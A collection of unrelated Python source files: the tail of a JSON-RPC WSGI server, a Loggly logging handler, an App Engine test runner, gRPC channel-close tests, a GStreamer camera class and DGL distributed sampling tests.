context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'ModelSEEDCOBRA'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_ModelSEEDCOBRA.run_phase_plain_analysis,
name='ModelSEEDCOBRA.run_phase_plain_analysis',
types=[dict])
self.method_authentication['ModelSEEDCOBRA.run_phase_plain_analysis'] = 'required' # noqa
self.rpc_service.add(impl_ModelSEEDCOBRA.status,
name='ModelSEEDCOBRA.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'ModelSEEDCOBRA ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
loggly_handler.py
|
from __future__ import absolute_import
import atexit
import json
import os
import threading
from functools import partial
import sys
import requests
from restapi_logging_handler.restapi_logging_handler import (
RestApiHandler,
serialize,
)
def setInterval(interval):
def decorator(function):
def wrapper(*args, **kwargs):
stopped = threading.Event()
def loop(): # executed in another thread
while not stopped.wait(interval): # until stopped
function(*args, **kwargs)
t = threading.Thread(target=loop)
t.daemon = True # stop if the program exits
t.start()
return stopped
return wrapper
return decorator
class LogglyHandler(RestApiHandler):
"""
A handler which pipes all logs to loggly through HTTP POST requests.
Some ideas borrowed from github.com/kennedyj/loggly-handler
"""
def __init__(self,
custom_token=None,
app_tags=None,
max_attempts=5,
aws_tag=False):
"""
customToken: The loggly custom token account ID
appTags: Loggly tags. Can be a tag string or a list of tag strings
aws_tag: include aws instance id in tags if True and id can be found
"""
self.pid = os.getpid()
self.tags = self._getTags(app_tags)
self.custom_token = custom_token
self.aws_tag = aws_tag
if self.aws_tag:
id_url = None
try:
aws_base = "http://169.254.169.254/latest/meta-data/{}"
id_url = aws_base.format('instance-id')
self.ec2_id = requests.get(id_url, timeout=2).content.decode(
'utf-8')
except Exception as e:
sys.stderr.write(
'Could not obtain metadata from url {} error {}'.format(
id_url, repr(e)
))
self.ec2_id = 'id_NA'
self.tags.append(self.ec2_id)
super(LogglyHandler, self).__init__(self._getEndpoint())
self.max_attempts = max_attempts
self.timer = None
self.logs = []
self.timer = self._flushAndRepeatTimer()
atexit.register(self._stopFlushTimer)
@setInterval(1)
def _flushAndRepeatTimer(self):
self.flush()
def _stopFlushTimer(self):
self.timer.set()
self.flush()
def _getTags(self, app_tags):
if isinstance(app_tags, str):
tags = app_tags.split(',')
else:
tags = app_tags
if 'bulk' not in tags:
tags.insert(0, 'bulk')
return tags
def _implodeTags(self, add_tags=None):
if add_tags:
tags = self.tags.copy()
tags.extend(add_tags)
else:
tags = self.tags
return ",".join(tags)
def _getEndpoint(self, add_tags=None):
"""
Override Build Loggly's RESTful API endpoint
"""
return 'https://logs-01.loggly.com/bulk/{0}/tag/{1}/'.format(
self.custom_token,
self._implodeTags(add_tags=add_tags)
)
def _prepPayload(self, record):
"""
record: generated from logger module
This preps the payload to be formatted in whatever content-type is
expected from the RESTful API.
"""
# return json.dumps(self._getPayload(record), default=serialize)
return self._getPayload(record)
def _getPayload(self, record):
"""
The data that will be sent to loggly.
"""
payload = super(LogglyHandler, self)._getPayload(record)
payload['tags'] = self._implodeTags()
return payload
def handle_response(self, sess, resp, batch=None, attempt=0, ):
if resp.status_code != 200:
if attempt <= self.max_attempts:
attempt += 1
self.flush(batch, attempt)
else:
sys.stderr.write(
'LogglyHandler: max post attempts '
'failed status {} content {}'.format(
resp.status_code, resp.content.decode()
))
def flush(self, current_batch=None, attempt=1):
if current_batch is None:
self.logs, current_batch = [], self.logs
if current_batch:
# group by process id and thread id, for tags
pids = {}
for d in current_batch:
pid = d.pop('pid', 'nopid')
tid = d.pop('tid', 'notid')
data = json.dumps(d, default=serialize)
if pid in pids:
p = pids[pid]
if tid in p:
p[tid].append(data)
else:
p[tid] = [data]
else:
pids[pid] = {tid: [data]}
for pid, tids in pids.items():
for tid, data in tids.items():
callback = partial(
self.handle_response, batch=data, attempt=attempt)
url = self._getEndpoint(add_tags=[pid, tid])
payload = '\n'.join(data)
self.session.post(
url,
data=payload,
headers={'content-type': 'application/json'},
background_callback=callback
)
def emit(self, record):
"""
Override emit() method in handler parent for sending log to RESTful
API
"""
pid = os.getpid()
if pid != self.pid:
self.pid = pid
self.logs = []
self.timer = self._flushAndRepeatTimer()
atexit.register(self._stopFlushTimer)
# avoid infinite recursion
if record.name.startswith('requests'):
return
self.logs.append(self._prepPayload(record))
|
server_tests.py
|
#!/usr/bin/python2.7
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starts up an appserver and runs end-to-end tests against it.
Instead of running this script directly, use the 'server_tests' shell script,
which sets up the PYTHONPATH and other necessary environment variables.
The actual test cases reside in server_test_cases.py.
Use -k to select particular test classes or methods by a substring match:
tools/server_tests -k ConfigTests
tools/server_tests -k test_delete_and_restore
Specify -v to show the name of each test as it runs (rather than just dots).
Specify -s to see the messages printed by all tests as they run (by default,
stdout/stderr will be captured and then shown only for failing tests).
"""
import os
import pytest
import re
import signal
import smtpd
import subprocess
import sys
import tempfile
import threading
import time
from model import *
import remote_api
import setup_pf as setup
class ProcessRunner(threading.Thread):
"""A thread that starts a subprocess, collects its output, and stops it."""
READY_RE = re.compile('') # this output means the process is ready
ERROR_RE = re.compile('ERROR|CRITICAL') # output indicating failure
OMIT_RE = re.compile('INFO |WARNING ') # don't bother showing these lines
debug = False # set to True to see all log messages, ignoring OMIT_RE
def __init__(self, name, args):
threading.Thread.__init__(self)
self.name = name
self.args = args
self.process = None # subprocess.Popen instance
self.ready = False # process is running and ready
self.failed = False # process emitted an error message in its output
self.output = []
def run(self):
"""Starts the subprocess and collects its output while it runs."""
self.process = subprocess.Popen(
self.args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
close_fds=True)
# Each subprocess needs a thread to be watching it and absorbing its
# output; otherwise it will block when its stdout pipe buffer fills.
self.start_watching_output(self.process.stdout)
self.start_watching_output(self.process.stderr)
self.process.wait()
def start_watching_output(self, output):
stdout_thread = threading.Thread(target=self.watch_output, args=(output,))
stdout_thread.setDaemon(True)
stdout_thread.start()
def watch_output(self, output):
while self.process.poll() is None:
line = output.readline()
if not line: # process finished
return
if self.READY_RE.search(line):
self.ready = True
if not self.debug and self.OMIT_RE.search(line): # omit these lines
continue
if self.ERROR_RE.search(line): # something went wrong
self.failed = True
if line.strip():
self.output.append(line.strip('\n'))
def stop(self):
"""Terminates the subprocess and returns its status code."""
if self.process: # started
if self.isAlive(): # still running
os.kill(self.process.pid, signal.SIGINT)
else:
self.failed = self.process.returncode != 0
self.clean_up()
if self.failed:
self.flush_output()
print >>sys.stderr, '%s failed (status %s).\n' % (
self.name, self.process.returncode)
else:
print >>sys.stderr, '%s stopped.' % self.name
def flush_output(self):
"""Flushes the buffered output from this subprocess to stderr."""
self.output, lines_to_print = [], self.output
if lines_to_print:
sys.stderr.write('\n--- output from %s ---\n' % self.name)
sys.stderr.write('\n'.join(lines_to_print) + '\n\n')
def wait_until_ready(self, timeout=10):
"""Waits until the subprocess has logged that it is ready."""
fail_time = time.time() + timeout
while self.isAlive() and not self.ready and time.time() < fail_time:
for jiffy in range(10): # wait one second, aborting early if ready
if not self.ready:
time.sleep(0.1)
if not self.ready:
self.flush_output() # after each second, show output
if self.ready:
print >>sys.stderr, '%s started.' % self.name
else:
raise RuntimeError('%s failed to start.' % self.name)
def clean_up(self):
pass
class AppServerRunner(ProcessRunner):
"""Manages a dev_appserver subprocess."""
READY_RE = re.compile('Starting module "default" running at|Running application')
OMIT_RE = re.compile(
'INFO |WARNING |DeprecationWarning: get_request_cpu_usage')
def __init__(self, port, smtp_port):
self.__datastore_file = tempfile.NamedTemporaryFile()
ProcessRunner.__init__(self, 'appserver', [
os.environ['PYTHON'],
os.path.join(os.environ['APPENGINE_DIR'], 'dev_appserver.py'),
os.environ['APP_DIR'],
'--port=%s' % port,
'--datastore_path=%s' % self.__datastore_file.name,
'--require_indexes',
'--smtp_host=localhost',
'--smtp_port=%d' % smtp_port,
# By default, if we perform a datastore write and a query in this
# order, the query may see the data before the write is applied.
# This is the behavior in the production, but it is inconvenient
# to perform server tests, because we often perform a database
# write then test if it's visible in the web page. This flag makes
# sure that the query see the data after the write is applied.
'--datastore_consistency_policy=consistent',
])
class MailThread(threading.Thread):
"""Runs an SMTP server and stores the incoming messages."""
messages = []
def __init__(self, port):
threading.Thread.__init__(self)
self.port = port
self.stop_requested = False
def run(self):
class MailServer(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
print >>sys.stderr, 'mail from:', mailfrom, 'to:', rcpttos
MailThread.messages.append(
{'from': mailfrom, 'to': rcpttos, 'data': data})
try:
server = MailServer(('localhost', self.port), None)
except Exception, e:
print >>sys.stderr, 'SMTP server failed: %s' % e
sys.exit(-1)
print >>sys.stderr, 'SMTP server started.'
while not self.stop_requested:
smtpd.asyncore.loop(timeout=0.5, count=1)
print >>sys.stderr, 'SMTP server stopped.'
def stop(self):
self.stop_requested = True
def wait_until_ready(self, timeout=10):
pass
def flush_output(self):
pass
class PyTestPlugin:
"""A plugin for pytest that does the setup and teardown for server tests."""
def __init__(self):
self.threads = []
def pytest_addoption(self, parser):
group = parser.getgroup(
'server_tests', 'App Engine server testing', after='general')
group.addoption('--server',
help='appserver URL (default: localhost:8081)')
group.addoption('--port', type='int', default=8081,
help='appserver port number (default: 8081)')
group.addoption('--mailport', type='int', default=8025,
help='SMTP server port number (default: 8025)')
def pytest_configure(self, config):
options = config.option
url = options.server or 'localhost:%d' % options.port
secure, host, port, path = remote_api.parse_url(url)
if host == 'localhost':
# We need to start up a clean new appserver for testing.
self.threads.append(AppServerRunner(options.port, options.mailport))
self.threads.append(MailThread(options.mailport))
for thread in self.threads:
thread.start()
for thread in self.threads:
thread.wait_until_ready()
# Connect to the datastore.
url, app_id = remote_api.connect(url, 'test@example.com', 'test')
# Reset the datastore for the first test.
reset_data()
# Give the tests access to configuration information.
config.hostport = '%s:%d' % (host, port)
config.mail_server = MailThread
def pytest_unconfigure(self, config):
for thread in self.threads:
if hasattr(thread, 'flush_output'):
thread.flush_output()
for thread in self.threads:
thread.stop()
thread.join()
def pytest_runtest_setup(self):
MailThread.messages = []
def reset_data():
"""Reset the datastore to a known state, populated with test data."""
setup.reset_datastore()
db.put([
Authorization.create(
'haiti', 'test_key', domain_write_permission='test.google.com'),
Authorization.create(
'haiti', 'domain_test_key',
domain_write_permission='mytestdomain.com'),
Authorization.create(
'haiti', 'reviewed_test_key',
domain_write_permission='test.google.com',
mark_notes_reviewed=True),
Authorization.create(
'haiti', 'not_allow_believed_dead_test_key',
domain_write_permission='test.google.com',
believed_dead_permission=False),
Authorization.create(
'haiti', 'allow_believed_dead_test_key',
domain_write_permission='test.google.com',
believed_dead_permission=True),
Authorization.create(
'haiti', 'other_key', domain_write_permission='other.google.com'),
Authorization.create(
'haiti', 'read_key', read_permission=True),
Authorization.create(
'haiti', 'full_read_key', full_read_permission=True),
Authorization.create(
'haiti', 'search_key', search_permission=True),
Authorization.create(
'haiti', 'subscribe_key', subscribe_permission=True),
Authorization.create(
'*', 'global_test_key',
domain_write_permission='globaltestdomain.com'),
Authorization.create(
'*', 'global_search_key', search_permission=True),
])
def monkeypatch_pytest_terminal_reporter():
"""Improves the output produced by _pytest.terminal.TerminalReporter."""
import _pytest.terminal
def write_sep(self, sep, title=None, **markup):
if sep == '_':
markup['cyan'] = 1 # highlight the failed test name in cyan
self._tw.line() # put a blank line before the failure report
self._tw.sep(sep, title, **markup)
_pytest.terminal.TerminalReporter.write_sep = write_sep
if __name__ == '__main__':
monkeypatch_pytest_terminal_reporter()
# Run the tests, using sys.exit to set exit status (nonzero for failure).
sys.exit(pytest.main(plugins=[PyTestPlugin()]))
|
_channel_close_test.py
|
# Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests server and client side compression."""
import itertools
import logging
import threading
import time
import unittest
import grpc
from tests.unit import test_common
from tests.unit.framework.common import test_constants
_BEAT = 0.5
_SOME_TIME = 5
_MORE_TIME = 10
_STREAM_URI = 'Meffod'
_UNARY_URI = 'MeffodMan'
class _StreamingMethodHandler(grpc.RpcMethodHandler):
request_streaming = True
response_streaming = True
request_deserializer = None
response_serializer = None
def stream_stream(self, request_iterator, servicer_context):
for request in request_iterator:
yield request * 2
class _UnaryMethodHandler(grpc.RpcMethodHandler):
request_streaming = False
response_streaming = False
request_deserializer = None
response_serializer = None
def unary_unary(self, request, servicer_context):
return request * 2
_STREAMING_METHOD_HANDLER = _StreamingMethodHandler()
_UNARY_METHOD_HANDLER = _UnaryMethodHandler()
class _GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == _STREAM_URI:
return _STREAMING_METHOD_HANDLER
else:
return _UNARY_METHOD_HANDLER
_GENERIC_HANDLER = _GenericHandler()
class _Pipe(object):
def __init__(self, values):
self._condition = threading.Condition()
self._values = list(values)
self._open = True
def __iter__(self):
return self
def _next(self):
with self._condition:
while not self._values and self._open:
self._condition.wait()
if self._values:
return self._values.pop(0)
else:
raise StopIteration()
def next(self):
return self._next()
def __next__(self):
return self._next()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify()
def close(self):
with self._condition:
self._open = False
self._condition.notify()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
class ChannelCloseTest(unittest.TestCase):
def setUp(self):
self._server = test_common.test_server(
max_workers=test_constants.THREAD_CONCURRENCY)
self._server.add_generic_rpc_handlers((_GENERIC_HANDLER,))
self._port = self._server.add_insecure_port('[::]:0')
self._server.start()
def tearDown(self):
self._server.stop(None)
def test_close_immediately_after_call_invocation(self):
channel = grpc.insecure_channel('localhost:{}'.format(self._port))
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterator = _Pipe(())
response_iterator = multi_callable(request_iterator)
channel.close()
request_iterator.close()
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_close_while_call_active(self):
channel = grpc.insecure_channel('localhost:{}'.format(self._port))
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterator = _Pipe((b'abc',))
response_iterator = multi_callable(request_iterator)
next(response_iterator)
channel.close()
request_iterator.close()
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_context_manager_close_while_call_active(self):
with grpc.insecure_channel('localhost:{}'.format(
self._port)) as channel: # pylint: disable=bad-continuation
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterator = _Pipe((b'abc',))
response_iterator = multi_callable(request_iterator)
next(response_iterator)
request_iterator.close()
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_context_manager_close_while_many_calls_active(self):
with grpc.insecure_channel('localhost:{}'.format(
self._port)) as channel: # pylint: disable=bad-continuation
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterators = tuple(
_Pipe((b'abc',))
for _ in range(test_constants.THREAD_CONCURRENCY))
response_iterators = []
for request_iterator in request_iterators:
response_iterator = multi_callable(request_iterator)
next(response_iterator)
response_iterators.append(response_iterator)
for request_iterator in request_iterators:
request_iterator.close()
for response_iterator in response_iterators:
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_many_concurrent_closes(self):
channel = grpc.insecure_channel('localhost:{}'.format(self._port))
multi_callable = channel.stream_stream(_STREAM_URI)
request_iterator = _Pipe((b'abc',))
response_iterator = multi_callable(request_iterator)
next(response_iterator)
start = time.time()
end = start + _MORE_TIME
def sleep_some_time_then_close():
time.sleep(_SOME_TIME)
channel.close()
for _ in range(test_constants.THREAD_CONCURRENCY):
close_thread = threading.Thread(target=sleep_some_time_then_close)
close_thread.start()
while True:
request_iterator.add(b'def')
time.sleep(_BEAT)
if end < time.time():
break
request_iterator.close()
self.assertIs(response_iterator.code(), grpc.StatusCode.CANCELLED)
def test_exception_in_callback(self):
with grpc.insecure_channel('localhost:{}'.format(
self._port)) as channel:
stream_multi_callable = channel.stream_stream(_STREAM_URI)
endless_iterator = itertools.repeat(b'abc')
stream_response_iterator = stream_multi_callable(endless_iterator)
future = channel.unary_unary(_UNARY_URI).future(b'abc')
def on_done_callback(future):
raise Exception("This should not cause a deadlock.")
future.add_done_callback(on_done_callback)
future.result()
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
|
camera.py
|
import cv2
import atexit
import traitlets
import threading
import numpy as np
class GStreamerCamera(traitlets.HasTraits):
value = traitlets.Any()
width = traitlets.Integer(default_value=320)
height = traitlets.Integer(default_value=180)
running = traitlets.Bool(default_value=False)
src = traitlets.Integer(default_value=0)
rate = traitlets.Integer(default_value=30)
native_width = traitlets.Integer(default_value=1280)
native_height = traitlets.Integer(default_value=720)
@staticmethod
def encode_image(image):
return bytes(cv2.imencode('.jpg', image)[1])
def __init__(self, *args, **kwargs):
super(GStreamerCamera, self).__init__(*args, **kwargs)
self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)
self._running = False
try:
self.cap = cv2.VideoCapture(self._gst_str(), cv2.CAP_GSTREAMER)
re, image = self.cap.read()
if not re:
raise RuntimeError('Could not read image from camera.')
except:
raise RuntimeError(
'Could not initialize camera. Please see error trace.')
atexit.register(self.cap.release)
def _gst_str(self):
return 'nvarguscamerasrc sensor-id=%d ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink' % (
self.src, self.native_width, self.native_height, self.rate, self.width, self.height)
def _read(self):
re, image = self.cap.read()
if re:
return image
else:
raise RuntimeError('Could not read image from camera')
def read(self):
if self._running:
raise RuntimeError('Cannot read directly while camera is running')
self.value = self._read()
return self.value
def _capture_frames(self):
while True:
if not self._running:
break
self.value = self._read()
@traitlets.observe('running')
def _on_running(self, change):
if change['new'] and not change['old']:
# transition from not running -> running
self._running = True
self.thread = threading.Thread(target=self._capture_frames)
self.thread.start()
elif change['old'] and not change['new']:
# transition from running -> not running
self._running = False
self.thread.join()
|
test_distributed_sampling.py
|
import dgl
import unittest
import os
from dgl.data import CitationGraphDataset
from dgl.distributed import sample_neighbors
from dgl.distributed import partition_graph, load_partition, load_partition_book
import sys
import multiprocessing as mp
import numpy as np
import backend as F
import time
from utils import get_local_usable_addr
from pathlib import Path
from dgl.distributed import DistGraphServer, DistGraph
def start_server(rank, tmpdir, disable_shared_mem, graph_name):
g = DistGraphServer(rank, "rpc_ip_config.txt", 1,
tmpdir / (graph_name + '.json'), disable_shared_mem=disable_shared_mem)
g.start()
def start_sample_client(rank, tmpdir, disable_shared_mem):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_sampling.json', rank)
dist_graph = DistGraph("rpc_ip_config.txt", "test_sampling", gpb=gpb)
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_sampling(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
print(g.idtype)
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling(Path(tmpdirname), 2)
def check_rpc_sampling_shuffle(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64)
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64)
for i in range(num_server):
part, _, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling_shuffle():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
